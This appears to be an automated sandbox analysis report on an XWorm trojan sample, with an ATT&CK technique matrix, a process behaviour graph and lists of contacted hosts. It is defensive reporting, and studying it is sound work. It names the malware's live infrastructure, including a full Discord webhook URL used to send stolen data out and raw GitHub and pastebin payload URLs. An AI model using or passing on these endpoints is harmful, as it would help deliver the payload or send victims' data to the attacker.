Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link
111
Windows Management Instrumentation
11
Registry Run Keys / Startup Folder
11
Process Injection
1
Masquerading
OS Credential Dumping111
Security Software Discovery
Remote Services1
Archive Collected Data
1
Web Service
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Registry Run Keys / Startup Folder
131
Virtualization/Sandbox Evasion
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
PowerShell
Logon Script (Windows)1
DLL Side-Loading
11
Process Injection
Security Account Manager131
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
File and Directory Discovery
SSHKeylogging15
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Regsvr32
Cached Domain Credentials12
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Rundll32
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534112 Sample: HQsitBLlOv.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 68 pastebin.com 2->68 70 raw.githubusercontent.com 2->70 72 2 other IPs or domains 2->72 86 Suricata IDS alerts for network traffic 2->86 88 Malicious sample detected (through community Yara rule) 2->88 90 Multi AV Scanner detection for submitted file 2->90 94 3 other signatures 2->94 10 loaddll64.exe 1 2->10         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 92 Connects to a pastebin service (likely for C&C) 68->92 process4 signatures5 108 Obfuscated command line found 10->108 17 rundll32.exe 10->17         started        20 regsvr32.exe 10->20         started        22 cmd.exe 1 10->22         started        32 2 other processes 10->32 110 Suspicious powershell command line found 13->110 24 powershell.exe 7 13->24         started        26 conhost.exe 1 13->26         started        28 powershell.exe 15->28         started        30 conhost.exe 1 15->30         started        process6 dnsIp7 82 Obfuscated command line found 17->82 35 powershell.exe 14 18 17->35         started        40 powershell.exe 20->40         started        42 rundll32.exe 22->42         started        84 Suspicious powershell command line found 24->84 44 powershell.exe 13 24->44         started        46 powershell.exe 28->46         started        66 discord.com 162.159.136.232, 443, 49832, 49888 CLOUDFLARENETUS United States 32->66 signatures8 process9 dnsIp10 74 raw.githubusercontent.com 185.199.109.133, 443, 49742, 49743 FASTLYUS Netherlands 35->74 64 C:\ProgramData\...\BeginSync.lnk, MS 35->64 dropped 96 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 35->96 98 Suspicious powershell command line found 35->98 100 Uses cmd line tools excessively to alter registry or file data 35->100 104 2 other signatures 35->104 48 conhost.exe 35->48         started        50 attrib.exe 1 35->50         started        76 pastebin.com 104.20.4.235, 443, 49733, 49734 CLOUDFLARENETUS United States 40->76 52 conhost.exe 40->52         started        54 attrib.exe 1 40->54         started        102 Obfuscated command line found 42->102 56 powershell.exe 42->56         started        78 172.67.19.24, 443, 49881, 49885 CLOUDFLARENETUS United States 44->78 file11 signatures12 process13 dnsIp14 80 tinyurl.com 104.17.112.233, 49727, 49728, 49729 CLOUDFLARENETUS United States 56->80 106 Uses cmd line tools excessively to alter registry or file data 56->106 60 conhost.exe 56->60         started        62 attrib.exe 1 56->62         started        signatures15 process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
HQsitBLlOv.dll42%ReversingLabsWin64.Trojan.XWorm
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.m0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
104.17.112.233
truefalse
    unknown
    discord.com
    162.159.136.232
    truetrue
      unknown
      raw.githubusercontent.com
      185.199.109.133
      truetrue
        unknown
        pastebin.com
        104.20.4.235
        truetrue
          unknown
          s-part-0032.t-0009.t-msedge.net
          13.107.246.60
          truefalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://tinyurl.com/yeykydunfalse
              unknown
              http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                unknown
                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                  unknown
                  http://pastebin.com/raw/sA04Mwk2false
                    unknown
                    https://pastebin.com/raw/sA04Mwk2false
                      unknown
                      https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2true
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://discord.compowershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C5B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmptrue
                          unknown
                          https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6648C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6646D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66469000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66482000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66486000.00000004.00000800.00020000.00000000.sdmptrue
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQpowershell.exe, 00000006.00000002.2569213401.0000027681730000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703735000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B59D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D8A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7FC3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66490000.00000004.00000800.00020000.00000000.sdmptrue
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://go.micropowershell.exe, 00000006.00000002.2569213401.000002768089A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227028F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7938000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E65E63000.00000004.00000800.00020000.00000000.sdmptrue
                                • URL Reputation: safe
                                unknown
                                http://crl.mTpowershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.microsoft.copowershell.exe, 0000001C.00000002.3255147271.0000025E7D9E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://contoso.com/Iconpowershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://raw.githubusercontpowershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://discord.compowershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://crl.mpowershell.exe, 00000007.00000002.3055012745.000002271A54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://discord.com/api/webhooks/128545359042878powershell.exe, 00000006.00000002.2569213401.000002768074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227027AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4A23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789E1EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B88E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E66D6B000.00000004.00000800.00020000.00000000.sdmptrue
                                            unknown
                                            https://raw.githubusercontent.compowershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contoso.com/powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2929908311.00000276901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2929908311.000002769006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2512610521.00000278AC1DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://tinyurl.compowershell.exe, 00000006.00000002.2569213401.0000027680225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768160B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.000002768129A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227021F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227035DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227032F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5423000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4495000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D179000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C395000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D77A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://raw.githubusercontent.compowershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7F56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E663E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://raw.githubusercontepowershell.exe, 00000006.00000002.2569213401.00000276816A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022703675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B5919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789D816000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://raw.githubusercontent.comXpowershell.exe, 00000006.00000002.2569213401.00000276803D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000006.00000002.2569213401.0000027680001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2576842522.0000022701FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2586069317.00000242B4271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2479111424.000002789C171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B748C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2742508128.00000223B7457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6591E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2819493490.0000025E6590B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt2powershell.exe, 00000007.00000002.2576842522.00000227023A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
